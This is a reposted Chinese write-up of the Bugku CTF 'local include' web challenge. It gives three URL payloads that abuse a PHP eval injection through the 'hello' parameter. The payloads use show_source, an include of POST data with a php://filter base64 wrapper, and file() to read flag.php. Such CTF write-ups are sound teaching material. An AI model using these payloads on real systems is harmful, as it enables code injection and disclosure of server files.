碼上快樂

相關內容    簡體    繁體

BugkuWeb本地包含

本文轉載自   查看原文   2019-03-19 21:36   1162    CTF學習

知識點:$_REQUEST不是一個函數,它是一個超全局變量,里面包括有$_GET $_POST $_COOKIE的值,$_REPUEST 是接收了 $_GET $_POST $_COOKIE 三個的集合

 

題目中的 地址已經不行了

所以這是轉自https://blog.csdn.net/dyw_666666/article/details/82389457#comments,感謝分享

 



 

 

方法一:eval存在命令執行漏洞,使用hello構造payload

http://120.24.86.145:8003/index.php?hello=1);show_source(%27flag.php%27);var_dump(3

 

 

方法二:

1.http://120.24.86.145:8003/index.php?hello=1);include $_POST['f'];//
2.在POST區域:f=php://filter/convert.base64-encode/resource=flag.php

 

Base64解碼即可。

 

 

方法三:直接將flag.php文件讀入變量hello中

1.?hello=get_file_contents('flag.php')
2.?hello=file('flag.php')



 



 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 9.本地包含(這題可能出現了問題) Bugku-CTF之本地包含( 60) 本地文件包含漏洞利用姿勢 maven打包時包含本地jar Maven打成可執行jar,包含maven依賴,本地依賴。 Elasticsearch 核心插件Kibana 本地文件包含漏洞分析(CVE-2018-17246) Hikvision iVMS 4200 /index.php 本地文件包含漏洞復現 系統區域設置 本地語言的支持依賴於 /etc/locale.conf,/etc/locale.conf 包含不少於此相關的環境變量 無法推送一些引用到 'git@github.com:Apologise/DjangoSample.git' 提示:更新被拒絕,因為遠程倉庫包含您本地尚不存在的提交。 文件包含
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM